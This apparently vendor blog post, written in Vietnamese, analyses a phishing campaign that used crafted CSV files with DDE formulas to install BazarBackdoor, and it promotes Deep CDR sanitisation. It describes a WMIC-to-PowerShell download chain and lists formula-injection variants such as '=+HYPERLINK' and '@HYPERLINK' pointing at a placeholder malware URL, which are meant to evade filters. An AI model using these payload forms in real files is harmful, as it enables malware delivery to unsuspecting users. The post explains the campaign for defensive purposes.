Vào tháng 2 năm 2022, nhà nghiên cứu mã độc Chris Campbell đã phát hiện ra một chiến dịch lừa đảo mới sử dụng các tệp văn bản CSV (giá trị phân cách bằng dấu phẩy) được thiết kế đặc biệt để lây nhiễm trojan BazarBackdoor vào thiết bị của người dùng. Trong bài đăng trên blog này, chúng tôi phân tích kịch bản tấn công và chỉ cho bạn cách ngăn chặn cuộc tấn công tinh vi này bằng Deep CDR (Giải trừ và Tái thiết Nội dung).
Chiến thuật tấn công
Trong chiến dịch lừa đảo này, tội phạm mạng đã sử dụng tệp CSV - tệp văn bản được phân tách lưu trữ dữ liệu ở định dạng bảng và sử dụng dấu phẩy để phân tách các giá trị. Loại tệp này là một cách phổ biến để trao đổi dữ liệu đơn giản giữa cơ sở dữ liệu và ứng dụng. Vì tệp CSV chỉ đơn giản chứa văn bản không có mã thực thi, rất nhiều người dùng nghĩ rằng nó vô hại và nhanh chóng mở tài liệu mà không cần thận trọng. Họ không nghi ngờ rằng tệp đó có thể là vectơ đe dọa mà qua đó mã độc có thể xâm nhập vào thiết bị của họ nếu tệp CSV được mở bằng các ứng dụng hỗ trợ Dynamic Data Exchange (DDE), chẳng hạn như Microsoft Excel và OpenOffice Calc. Các ứng dụng này có thể thực thi các công thức và hàm trong tệp CSV. Các tác giả đe dọa lạm dụng tính năng DDE này để thực hiện các lệnh tùy ý, tải xuống và cài đặt trojan BazarBackdoor, để thỏa hiệp và truy cập đầy đủ vào mạng công ty từ thiết bị của nạn nhân không cảnh giác. So với các phương pháp tấn công phổ biến với macro độc hại hoặc mã VBA ẩn trong tệp MS Office, các mối đe dọa ẩn bên trong tài liệu DDE khó phát hiện hơn.
Kiểm tra cẩn thận tệp, chúng ta có thể thấy a = WmiC | lệnh (Lệnh Giao diện Quản lý Windows) chứa trong một trong các cột dữ liệu. Nếu các nạn nhân vô tình cho phép hàm DDE này chạy, nó sẽ tạo ra một lệnh PowerShell. Các lệnh sau đó sẽ mở một URL từ xa để tải xuống BazarLoader và BazarBackdoor sẽ được cài đặt trên máy của nạn nhân.
Làm sao Deep CDR giúp bạn chống lại các cuộc tấn công DDE
Bạn có thể bảo vệ mạng của mình khỏi các chiến dịch lừa đảo tinh vi này bằng cách Làm sạch các tệp đính kèm trong email trước khi chúng đến tay người dùng. Với tư duy rằng mọi tệp đều có thể gây ra mối đe dọa tiềm ẩn và tập trung vào việc phòng ngừa thay vì chỉ phát hiện, Deep CDR xóa toàn bộ nội dung đang hoạt động trong các tệp nhưng vẫn duy trì khả năng sử dụng và chức năng của tệp. Deep CDR là một trong sáu công nghệ chủ chốt trong MetaDefender - OPSWAT nền tảng phòng ngừa mối đe dọa tiên tiến thực sự áp dụng triết lý Zero Trust.
Dưới đây là thông tin chi tiết về việc Làm sạch sau khi chúng tôi xử lý tệp CSV bị nhiễm bằng MetaDefender Core (Bạn cũng có thể tham khảo kết quả quét trên MetaDefender Cloud ). Deep CDR vô hiệu hóa công thức trong tệp nên không có lệnh PowerShell nào được tạo. Sau đó, mã độc không thể tải xuống được.
Trong các cuộc tấn công tương tự, các tác giả mối đe dọa sử dụng các công thức phức tạp hơn để tránh bị phát hiện. Thông thường, các công thức trong MS Excel bắt đầu bằng dấu bằng (=). Tuy nhiên, vì ứng dụng này cũng chấp nhận các công thức bắt đầu bằng một dấu khác, chẳng hạn như "=+" hoặc "@", thay vì chỉ "=", công thức hủy trong tệp CSV có thể là:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Những loại công thức này có thể tránh được một số hệ thống CDR phổ biến. Tuy nhiên, Deep CDR có thể dễ dàng xử lý chiến thuật này và tạo ra các tệp sạch, an toàn để sử dụng, do đó vô hiệu hóa mối đe dọa.
Tìm hiểu thêm về Deep CDR hoặc trao đổi với chuyên gia kỹ thuật OPSWAT để khám phá các giải pháp bảo mật tốt nhất giúp bảo vệ mạng doanh nghiệp và người dùng khỏi các cuộc tấn công zero-day và mã độc tiên tiến.
